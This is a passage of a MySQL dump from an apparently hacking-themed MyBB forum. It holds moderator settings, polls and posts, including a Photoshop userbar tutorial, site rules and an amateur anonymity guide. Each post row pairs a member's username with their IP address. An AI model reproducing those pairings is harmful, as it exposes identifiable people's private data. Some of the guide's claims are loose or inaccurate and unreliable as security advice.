`canmovetononmodforum`, `canusecustomtools`) VALUES ('3', '17', '6', '1', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO `mybb_moderators` (`mid`, `fid`, `id`, `isgroup`, `caneditposts`, `candeleteposts`, `canviewips`, `canopenclosethreads`, `canmanagethreads`, `canmovetononmodforum`, `canusecustomtools`) VALUES ('4', '3', '6', '1', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO `mybb_moderators` (`mid`, `fid`, `id`, `isgroup`, `caneditposts`, `candeleteposts`, `canviewips`, `canopenclosethreads`, `canmanagethreads`, `canmovetononmodforum`, `canusecustomtools`) VALUES ('5', '46', '6', '1', '1', '1', '0', '1', '1', '0', '1'); INSERT INTO `mybb_moderators` (`mid`, `fid`, `id`, `isgroup`, `caneditposts`, `candeleteposts`, `canviewips`, `canopenclosethreads`, `canmanagethreads`, `canmovetononmodforum`, `canusecustomtools`) VALUES ('6', '47', '6', '1', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO `mybb_moderators` (`mid`, `fid`, `id`, `isgroup`, `caneditposts`, `candeleteposts`, `canviewips`, `canopenclosethreads`, `canmanagethreads`, `canmovetononmodforum`, `canusecustomtools`) VALUES ('13', '61', '62', '0', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO `mybb_moderators` (`mid`, `fid`, `id`, `isgroup`, `caneditposts`, `candeleteposts`, `canviewips`, `canopenclosethreads`, `canmanagethreads`, `canmovetononmodforum`, `canusecustomtools`) VALUES ('10', '66', '61', '0', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO `mybb_moderators` (`mid`, `fid`, `id`, `isgroup`, `caneditposts`, `candeleteposts`, `canviewips`, `canopenclosethreads`, `canmanagethreads`, `canmovetononmodforum`, `canusecustomtools`) VALUES ('11', '79', '232', '0', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO `mybb_moderators` (`mid`, `fid`, `id`, `isgroup`, `caneditposts`, `candeleteposts`, `canviewips`, `canopenclosethreads`, `canmanagethreads`, `canmovetononmodforum`, `canusecustomtools`) VALUES ('14', '81', '100', '0', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO `mybb_moderators` (`mid`, `fid`, `id`, `isgroup`, `caneditposts`, `candeleteposts`, `canviewips`, `canopenclosethreads`, `canmanagethreads`, `canmovetononmodforum`, `canusecustomtools`) VALUES ('15', '61', '82', '0', '1', '1', '0', '1', '1', '1', '1'); INSERT INTO `mybb_moderators` (`mid`, `fid`, `id`, `isgroup`, `caneditposts`, `candeleteposts`, `canviewips`, `canopenclosethreads`, `canmanagethreads`, `canmovetononmodforum`, `canusecustomtools`) VALUES ('16', '82', '228', '0', '1', '1', '0', '1', '1', '1', '1'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_modtools`; CREATE TABLE `mybb_modtools` ( `tid` smallint(5) unsigned NOT NULL AUTO_INCREMENT, `name` varchar(200) NOT NULL, `description` text NOT NULL, `forums` text NOT NULL, `type` char(1) NOT NULL DEFAULT '', `postoptions` text NOT NULL, `threadoptions` text NOT NULL, PRIMARY KEY (`tid`) ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_modtools` WRITE; INSERT INTO `mybb_modtools` (`tid`, `name`, `description`, `forums`, `type`, `postoptions`, `threadoptions`) VALUES ('1', 'Junk ', 'A tool to automatically junk threads.', '', 't', '', 'a:14:{s:12:\"deletethread\";s:1:\"0\";s:12:\"mergethreads\";s:1:\"0\";s:10:\"deletepoll\";s:1:\"0\";s:15:\"removeredirects\";s:1:\"0\";s:13:\"approvethread\";s:0:\"\";s:10:\"openthread\";s:5:\"close\";s:10:\"movethread\";i:19;s:18:\"movethreadredirect\";s:1:\"0\";s:24:\"movethreadredirectexpire\";i:0;s:10:\"copythread\";i:0;s:10:\"newsubject\";s:15:\"[Junk]{subject}\";s:8:\"addreply\";s:29:\"This thread has been junked. \";s:12:\"replysubject\";s:9:\"{subject}\";s:12:\"threadprefix\";i:0;}'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_mycode`; CREATE TABLE `mybb_mycode` ( `cid` int(10) unsigned NOT NULL AUTO_INCREMENT, `title` varchar(100) NOT NULL DEFAULT '', `description` text NOT NULL, `regex` text NOT NULL, `replacement` text NOT NULL, `active` int(1) NOT NULL DEFAULT '0', `parseorder` smallint(5) unsigned NOT NULL DEFAULT '0', `amp_groups` varchar(100) NOT NULL, `amp_nogroups` varchar(100) NOT NULL, `amp_vgroups` varchar(100) NOT NULL, `amp_vreplace` text NOT NULL, `amp_forums` varchar(100) NOT NULL, `amp_noforums` varchar(100) NOT NULL, `amp_closed` int(10) NOT NULL, `amp_sticky` int(10) NOT NULL, `amp_other` int(10) NOT NULL, `amp_mod` int(10) NOT NULL, `amp_fmod` int(10) NOT NULL, `amp_admin` int(10) NOT NULL, PRIMARY KEY (`cid`) ) ENGINE=MyISAM AUTO_INCREMENT=8 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_mycode` WRITE; INSERT INTO `mybb_mycode` (`cid`, `title`, `description`, `regex`, `replacement`, `active`, `parseorder`, `amp_groups`, `amp_nogroups`, `amp_vgroups`, `amp_vreplace`, `amp_forums`, `amp_noforums`, `amp_closed`, `amp_sticky`, `amp_other`, `amp_mod`, `amp_fmod`, `amp_admin`) VALUES ('3', 'Twitter ', '', '\\[twitter\\](.*?)\\[/twitter\\]', 'Follow @$1 ', '1', '0', '', '', '', '', '', '', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_mycode` (`cid`, `title`, `description`, `regex`, `replacement`, `active`, `parseorder`, `amp_groups`, `amp_nogroups`, `amp_vgroups`, `amp_vreplace`, `amp_forums`, `amp_noforums`, `amp_closed`, `amp_sticky`, `amp_other`, `amp_mod`, `amp_fmod`, `amp_admin`) VALUES ('5', 'Staff Message', 'Staff Message for only the Forum Staff', '\\[mod\\](.*?)\\[/mod\\]', '

    \"\"/ $1

    ', '1', '0', '3,4,6', '1,2,9,5,7,8,10,12,13,14,15,16,17,18,20', '1,2,9,3,4,5,6,7,8,10,12,13,14,15,16,17,18,20', '', '1,3,50,49,4,5,2,48,19,6,7,56,42,47,65,64,9,8,10,11,12,59,13,14,46,15,20,21,16,17,18,43,51,69,52,53,6', '', '0', '0', '0', '1', '1', '1'); INSERT INTO `mybb_mycode` (`cid`, `title`, `description`, `regex`, `replacement`, `active`, `parseorder`, `amp_groups`, `amp_nogroups`, `amp_vgroups`, `amp_vreplace`, `amp_forums`, `amp_noforums`, `amp_closed`, `amp_sticky`, `amp_other`, `amp_mod`, `amp_fmod`, `amp_admin`) VALUES ('6', 'Google Search', 'Google Search', '\\[gsearch\\](.*?)\\[/gsearch\\]', 'Google Search For: $1', '1', '0', '1,2,9,3,4,5,6,7,8,10,12,13,14,15,17,20,21', '', '1,2,9,3,4,5,6,7,8,10,12,13,14,15,17,20,21', '', '1,3,50,49,4,5,2,48,19,6,7,56,83,42,47,65,64,9,8,10,11,12,59,13,14,46,15,20,21,16,17,18,43,51,69,52,5', '', '0', '0', '0', '0', '0', '0'); INSERT INTO `mybb_mycode` (`cid`, `title`, `description`, `regex`, `replacement`, `active`, `parseorder`, `amp_groups`, `amp_nogroups`, `amp_vgroups`, `amp_vreplace`, `amp_forums`, `amp_noforums`, `amp_closed`, `amp_sticky`, `amp_other`, `amp_mod`, `amp_fmod`, `amp_admin`) VALUES ('7', 'Highlight Text', 'Highlight Text with any color of your choice.', '\\[hl=(.*?)\\](.*?)\\[/hl\\]', ' $2', '1', '0', '', '', '', '', '', '', '0', '0', '0', '0', '0', '0'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_mypermissions_actions`; CREATE TABLE `mybb_mypermissions_actions` ( `aid` int(10) unsigned NOT NULL AUTO_INCREMENT, `file` varchar(100) NOT NULL DEFAULT '', `action` varchar(100) NOT NULL DEFAULT '', `description` varchar(300) NOT NULL DEFAULT '', `usergroups` varchar(300) NOT NULL DEFAULT '', PRIMARY KEY (`aid`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; LOCK TABLES `mybb_mypermissions_actions` WRITE; UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_polls`; CREATE TABLE `mybb_polls` ( `pid` int(10) unsigned NOT NULL AUTO_INCREMENT, `tid` int(10) unsigned NOT NULL DEFAULT '0', `question` varchar(200) NOT NULL DEFAULT '', `dateline` bigint(30) NOT NULL DEFAULT '0', `options` text NOT NULL, `votes` text NOT NULL, `numoptions` smallint(5) unsigned NOT NULL DEFAULT '0', `numvotes` smallint(5) unsigned NOT NULL DEFAULT '0', `timeout` bigint(30) NOT NULL DEFAULT '0', `closed` int(1) NOT NULL DEFAULT '0', `multiple` int(1) NOT NULL DEFAULT '0', `public` int(1) NOT NULL DEFAULT '0', PRIMARY KEY (`pid`) ) ENGINE=MyISAM AUTO_INCREMENT=5 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_polls` WRITE; INSERT INTO `mybb_polls` (`pid`, `tid`, `question`, `dateline`, `options`, `votes`, `numoptions`, `numvotes`, `timeout`, `closed`, `multiple`, `public`) VALUES ('1', '345', 'Which one looks better?', '1346962424', 'First one||~|~||Second one', '3||~|~||2', '2', '5', '0', '0', '0', '0'); INSERT INTO `mybb_polls` (`pid`, `tid`, `question`, `dateline`, `options`, `votes`, `numoptions`, `numvotes`, `timeout`, `closed`, `multiple`, `public`) VALUES ('2', '462', 'Which one?', '1347848288', 'First one||~|~||Second one||~|~||Third one', '3||~|~||0||~|~||0', '3', '3', '0', '0', '0', '0'); INSERT INTO `mybb_polls` (`pid`, `tid`, `question`, `dateline`, `options`, `votes`, `numoptions`, `numvotes`, `timeout`, `closed`, `multiple`, `public`) VALUES ('3', '767', 'Do you cheat/hack in games?', '1349702575', 'Yes||~|~||No! Hackers are noobs!', '5||~|~||1', '2', '6', '0', '0', '0', '1'); INSERT INTO `mybb_polls` (`pid`, `tid`, `question`, `dateline`, `options`, `votes`, `numoptions`, `numvotes`, `timeout`, `closed`, `multiple`, `public`) VALUES ('4', '889', 'Pick a theme (Can multi vote)', '1350361933', 'Theme 1||~|~||Theme 2||~|~||Theme 3', '6||~|~||0||~|~||2', '3', '8', '0', '0', '1', '0'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_pollvotes`; CREATE TABLE `mybb_pollvotes` ( `vid` int(10) unsigned NOT NULL AUTO_INCREMENT, `pid` int(10) unsigned NOT NULL DEFAULT '0', `uid` int(10) unsigned NOT NULL DEFAULT '0', `voteoption` smallint(5) unsigned NOT NULL DEFAULT '0', `dateline` bigint(30) NOT NULL DEFAULT '0', PRIMARY KEY (`vid`), KEY `pid` (`pid`,`uid`) ) ENGINE=MyISAM AUTO_INCREMENT=23 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_pollvotes` WRITE; INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('1', '1', '61', '1', '1346963758'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('2', '1', '112', '1', '1346992039'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('3', '1', '67', '2', '1347277719'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('4', '1', '82', '1', '1347305088'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('5', '1', '1', '2', '1347646718'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('6', '2', '82', '1', '1347913050'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('7', '2', '2', '1', '1347938294'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('8', '2', '194', '1', '1348108337'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('9', '3', '53', '1', '1349702580'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('10', '3', '82', '1', '1349703624'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('11', '3', '62', '1', '1349713370'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('12', '3', '214', '1', '1349827896'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('13', '3', '61', '2', '1350058590'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('14', '3', '257', '1', '1350113681'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('15', '4', '228', '1', '1350389624'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('16', '4', '3', '1', '1350426612'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('17', '4', '1', '1', '1350429103'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('18', '4', '2', '3', '1350449102'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('19', '4', '257', '1', '1350612477'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('20', '4', '222', '1', '1350624459'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('21', '4', '62', '1', '1350633319'); INSERT INTO `mybb_pollvotes` (`vid`, `pid`, `uid`, `voteoption`, `dateline`) VALUES ('22', '4', '53', '3', '1350641764'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_posts`; CREATE TABLE `mybb_posts` ( `pid` int(10) unsigned NOT NULL AUTO_INCREMENT, `tid` int(10) unsigned NOT NULL DEFAULT '0', `replyto` int(10) unsigned NOT NULL DEFAULT '0', `fid` smallint(5) unsigned NOT NULL DEFAULT '0', `subject` varchar(120) NOT NULL DEFAULT '', `icon` smallint(5) unsigned NOT NULL DEFAULT '0', `uid` int(10) unsigned NOT NULL DEFAULT '0', `username` varchar(80) NOT NULL DEFAULT '', `dateline` bigint(30) NOT NULL DEFAULT '0', `message` text NOT NULL, `ipaddress` varchar(30) NOT NULL DEFAULT '', `longipaddress` int(11) NOT NULL DEFAULT '0', `includesig` int(1) NOT NULL DEFAULT '0', `smilieoff` int(1) NOT NULL DEFAULT '0', `edituid` int(10) unsigned NOT NULL DEFAULT '0', `edittime` int(10) NOT NULL DEFAULT '0', `visible` int(1) NOT NULL DEFAULT '0', `posthash` varchar(32) NOT NULL DEFAULT '', `disableeditedby` int(1) NOT NULL DEFAULT '0', `edittime2` int(10) NOT NULL DEFAULT '0', PRIMARY KEY (`pid`), KEY `tid` (`tid`,`uid`), KEY `uid` (`uid`), KEY `visible` (`visible`), KEY `dateline` (`dateline`), KEY `longipaddress` (`longipaddress`), FULLTEXT KEY `message` (`message`) ) ENGINE=MyISAM AUTO_INCREMENT=7554 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_posts` WRITE; INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('1', '1', '0', '2', 'tggfg', '0', '1', 't3h jok3r', '1339740375', 'drffgjdf', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '8ef418a68d9a831d2b5eba10ab28dead', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2', '1', '1', '2', 'RE: tggfg', '0', '3', '??????????¢™', '1339904895', 'gdasagdndfgajngarbagg lmnop', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', 'e102c09c72f978cfe0276e67ddeb49d4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('3', '9', '0', '19', 'tggfg', '0', '2', 'Apathy', '1339907807', 'sdafasdfasdfsadfsgsfgf', '173.206.128.200', '-1378975544', '0', '0', '0', '0', '1', '932ea58f77ef2363cb331456f9359b77', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('4', '2', '0', '34', 'Userbar tut', '0', '2', 'Apathy', '1339911671', 'This is extremely easy to make. I guarantee that [i]anyone[/i] will be able to make their own user bars after this tutorial. Also it\'s my first tutorial, so be gentle. [color=#1E90FF][size=medium]Requirements:[/size][/color] 1. Adobe Photoshop (Any will do, but I made mine with CS5 Portable) 2. Font named \"Kremlin Bolshevik\" ( You can download it here for free: http://www.dafont.com/kremlin-bolshevik.font ) 3. The LF Userbar Template. [IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/blank-template.png[/IMG] [color=#1E90FF][size=medium]Getting Started:[/size][/color] Now that you have all the requirements, let\'s get started. [color=#87CEFA][size=medium]1.[/size][/color] First you\'ll want to open up the template in Photoshop. [spoiler] [IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/step1.png[/IMG] [/spoiler] [color=#87CEFA][size=medium]2.[/size][/color] Next, you\'ll want to go to your Type Tool and set the settings. Change the font to \"Kremlin Bolshevik\", font size to about 18 px. depending on how long your text will be, and change the text color to #333333. Now you\'ll want to write your text. In my case it\'s \"Psycho\". You\'ll also want to play around with the capitalization of the text to get a different form of each letter. [spoiler] [IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/step-2.png[/IMG] [/spoiler] [color=#87CEFA][size=medium]3.[/size][/color] Now we want to edit our text layer. So double-click on the text layer in the layers palette to the right to bring up the \"Layer Style\". We will add a Drop Shadow and a Stroke to our text. For the Drop Shadow use 50% Opacity and the angle at 90°. Leave the rest at default. As for the Stroke size use 1 px and the color at #989898. Leave the rest at default. Drop Shadow: [spoiler] [IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/drop-shadow.png[/IMG] [/spoiler] Stroke: [spoiler] [IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/stroke.png[/IMG] [/spoiler] [color=#87CEFA][size=medium]4.[/size][/color] Now your text should look something like this: [spoiler] [IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/step-4.png[/IMG] [/spoiler] [color=#87CEFA][size=medium]5.[/size][/color] Now it\'s time to look for an icon. For this it\'s up to you on what to use. I like going over to http://www.iconfinder.com/ because they have some really nice free icons. Alternatively, you can do a quick \"Google\" search. Once you find an icon you like, save it as a .PNG. [spoiler] [IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/step-5.png[/IMG] [/spoiler] [color=#87CEFA][size=medium]6.[/size][/color] Now we place our icon and re-size if needed. [spoiler] [IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/step6.png[/IMG] [/spoiler] [color=#87CEFA][size=medium]7.[/size][/color] To save it we want to \"Save for Web & Devices\". (You may also want to save a .PSD for editing later on.) [spoiler] [IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/step7.png[/IMG] [/spoiler] [color=#87CEFA][size=medium]8.[/size][/color] After you click on \"Save for Web & Devices\", a window like this will pop up. You\'ll want to make sure you save the file as a PNG-24 for higher quality. Also make sure you have the \"Transparency\" box ticked. Then click on \"Save\". [spoiler] [IMG]http://i410.photobucket.com/albums/pp181/GraphicDanny/step8.png[/IMG] [/spoiler] [color=#1E90FF][size=large]I hope you enjoyed my tutorial. If you have any extra questions please feel free to send me a PM.[/size][/color] Credits: Darko™', '173.206.128.200', '-1378975544', '0', '0', '1', '1345133407', '1', '4bea56debad64f3a2a1c1db64c3aee24', '0', '1345133407'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('322', '2', '4', '34', 'RE: Userbar tut', '0', '67', 'HoverCatz', '1345133839', 'This tut is mega awesome! :D', '85.165.36.95', '1436886111', '1', '0', '0', '0', '1', '70cb1786fec3287f2c2ee46cc88738f3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('22', '3', '7', '19', 'RE: Official Site Rules', '0', '1', 't3h jok3r', '1340037325', 'Nice rules. They have been added to the rule help document. http://l33thacking.com/misc.php?action=help&hid=8', '72.229.164.105', '1223009385', '1', '0', '0', '0', '1', '98901bb9d9e7ad81eace2a73f534943c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('6', '2', '4', '34', 'RE: userbar tut', '0', '1', 't3h jok3r', '1339969940', 'Thanks for releasing LH userbar tutorial so others can use it to make some for themselves or their groups on LH.', '72.229.164.105', '1223009385', '1', '0', '1', '1343948445', '1', '81ebfb07c2fca4cb60004456a03a5271', '0', '1343948445'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7', '3', '0', '19', '[Junk]Official Site Rules', '0', '3', '??????????¢™', '1339989731', '[b][u][align=center][color=#1E90FF][size=x-large]These are the official LH site rules[/size][/color][/align][/u][/b] [align=center][b][size=medium][color=#1E90FF]1.[/color] Members are not allowed to engage in threatening behavior toward other members. This includes flaming. Also threats to steal accounts, dox, or swat. This includes any on-site material such as posts, PMs, or profiles. [color=#1E90FF]2.[/color] No short, low quality posts like \"bump\", \"lol\", \"roflmao\", \"thanks\", \"Troll\" and any repeated characters to defeat the min character count. [color=#1E90FF]3.[/color] Don\'t attempt to infect members with trojans, viruses, or backdoors. [color=#1E90FF]4.[/color] No direct links to infected downloads in posts or profiles. [color=#1E90FF]5.[/color] No posting of personal information that isn\'t yours. Privacy is to be respected here. This includes any passwords, logins or dumps. [color=#1E90FF]6.[/color] You cannot ask for or offer reputation in posts, signatures, or PM. This includes encouragement like \"reputation is appreciated\". [color=#1E90FF]7.[/color] No adult images, adult links, or adult account trading. [color=#1E90FF]8.[/color] Multiple accounts will not be allowed unless you are reporting your original account as hacked. Ban evading will result in the permanent closing of your old account and new accounts. No exceptions. [color=#1E90FF]9.[/color] Advertising of competing sites is not allowed. This refers to hacking sites related to LH. Websites without forums or forums unrelated to hacking are acceptable. Advertising includes signatures, PMs, profiles, and posts. [color=#1E90FF]10.[/color] No posting of fake programs. [color=#1E90FF]11.[/color] No threads or posts for donation begging. This includes loan requests. [color=#1E90FF]12.[/color] No political or religious expression in your profile. This includes user titles, signatures, and avatars. [color=#1E90FF]13.[/color] We do not allow site goals or achievements in signature this includes but not limited to posts, reputation, upgrades, and groups memberships. [color=#1E90FF]14.[/color] Any rules posted in the forums header must also be reviewed. Some forums have special policies that must be adhered to. Don\'t post in any forum without reading them.[/size][/b][/align] [align=center][size=small]If you have any further questions feel free to PM me or any other admin.[/size][/align]', '75.22.48.94', '1259745374', '1', '0', '3', '1350151595', '1', 'c6b573234d46116748b4b0bdba48cae3', '0', '1350151595'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('8', '4', '0', '12', 'How to stay anonymous and how to protect your info over the internet (basics)', '0', '2', 'Apathy', '1339990220', '[b][color=#1E90FF][size=large] What is a VPN?[/size][/color][/b] A VPN is a program that changes your ip to a proxy ip for a temporary time over the internet. Some VPN links/download links: [spoiler] http://hotspotshield.com/ http://vpnreactor.com/ (I RECOMMEND THIS ONE SINCE IT KEEPS NO HISTORY) http://proxpn.com/ http://cyberghostvpn.com/en/product/download.html [/spoiler] [color=#32CD32][i]**links to all the VPNS above are FREE and its hard to find a free vpn so try using any one of them and i recommand hotspotshield and hidemyass.com[/i][/color] [size=large][b][color=#9400D3]When should i use a VPN?[/color][/b][/size] Whenever you are doing a blackhat/whitehat activity,to log on to any form,when logging on to your ONLINE BANKING ACCOUNT including facebook and many other sites [b]basically use a vpn every single time to go on the internet because anyone can get your ip easily and track down your history and if you use a proxy then it will be hard to track your history.[/b]Sometimes admins from forums pick a random ip from any user and misuse it so if you use a vpn you wont get tracked. [b][size=large][color=#FF0000]Some sites have proxy IPs blocked,what should i do? [/color][/size][/b] If your proxy ip is blocked as well then no need to worry log on and do whatever you want but when you log out remember to clear all your history including saved passwords and never keep saved passwords on pc/mac or on the browser.**Remember delete it everyday and if your online on for example 11:59 pm then delete it before it gets to 12:00 AM and then delete it again before logging off (JUST TO STAY ON THE SAFE SIDE) [b][color=#FFD700][size=large]Registering on a website! [/size][/color][/b] When registering on any site remember to never put your real email id,just make a spare one and use that one to j0in every single site except facebook.Because then you will be getting alot of spam/newsletters and if any off the email contains a virus or a hacking program than you would get hacked so use a spare one even if someone from another forum tries to hack you they will hack a useless account and will get nothing out of it. [b][color=#696969][size=large]Chatting with a friend[/size][/color][/b] Remember if your friend is asking you a weird question or a bunch of questions then dont reply back because their trying to make you spill out the answers to your security questions etc. [color=#8B4513][size=large][b]Creating your spare or any email id[/b][/size][/color] Always enter a wrong date or answer to your security questions such as if your DOB is 9/27/11 then change it to 9/27/10 and for security questions enter a name that you only know about or a location that is UNKNOWN and DONT TELL YOUR FRIENDS THAT YOU KNOW THAT LOCATION AND [b]NEVER ADD A ANSWER RELATED TO YOUR PERSONAL LIFE[/b]. [b][color=#FF1493][size=large]Facebook,Youtube,Myyearbook etc[/size][/color][/b] In your about me or info section just enter your first REAL name and any fav thing you would like to share and tell them to pm you for more info and never display your phone number/email id and try to keep the best and the highest security level possible for the account and if you notice that a websites giving you problems to log in or load then delete your account then it means that the site is getting attacked unless you believe it safe to be on that site. DONT WORRY HF IS A PROTECTED SITE SO YOUR SAFE :D. [color=#1E90FF][size=large][b]Re Login pop outs [/b][/size][/color] If you were logged in a site and if you click on a link or something and you go to another page and it asks you to retype the username and password DONT ENTER! because the chances are high for it for being a phishing site(NOT ALLOWED TO TALK ABOUT IT SO SEARCH IT UP ON GOOGLE . COM [WITHOUT SPACES]) [b][size=large][color=#8B4513]Downloading Something from the internet[/color][/size][/b] If you plan to download something from anyone except your family member than do a scan on the file to check if it has a virus or not and to check if it has a hacking program crypted in it. [u]1)Check it out from the email service your using. 2)go to this site to check it out [/u][spoiler]http://my-avscan.net/ or go here http://www.sandboxie.com/[/spoiler][u] 3)if you want then run your installed antivirus software of your pc/mac.[/u] [color=#32CD32]Here was a short tut about how to stay anonymous and protect your identity over the internet.(THIS TUT CONTAINED BASIC INFO) Hope you liked it and if you have any questions then feel free to pm me or leave a comment below.[/color]', '173.206.128.200', '-1378975544', '0', '0', '0', '0', '1', '7cfd19c6634822982ab058e324267f72', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('11', '4', '8', '12', 'RE: How to stay anonymous and how to protect your info over the internet (basics)', '0', '3', '??????????¢™', '1339991371', 'This is a great tutorial you got there OP, Hopefully it will help some people out.', '75.22.48.94', '1259745374', '1', '0', '0', '0', '1', 'c7530f9e49f004dfab6cc86ab415b97d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('12', '5', '0', '16', 'How to spot a liar', '0', '2', 'Apathy', '1339991477', '[size=large][color=#FF0000]Body Language[/color][/size] •When people lie there expressions are not usually too expressive and will tend not move there arms and hands alot or they fidget to much and move nonstop. •They will avoid eye contact or keep to much eye contact . •Scratching there noses or behind the ears and constantly touching there face, mouth or throat is a pretty good indicator that they are probably lying. •Some one who purse\'s there lips alot can indicate withholding information, extreme anxiety or withholding aggression. When someones lips become dry and they keep licking there lips it indicates that you are nervous. • Another thing to look out for is if let\'s say John, John\'s best friend just died and yet John when asked if he is sad he says yes while smiling. He is probably not telling the truth. • When someone lies they are not comfortable with silence because that means they do not know if there lie was accepted or 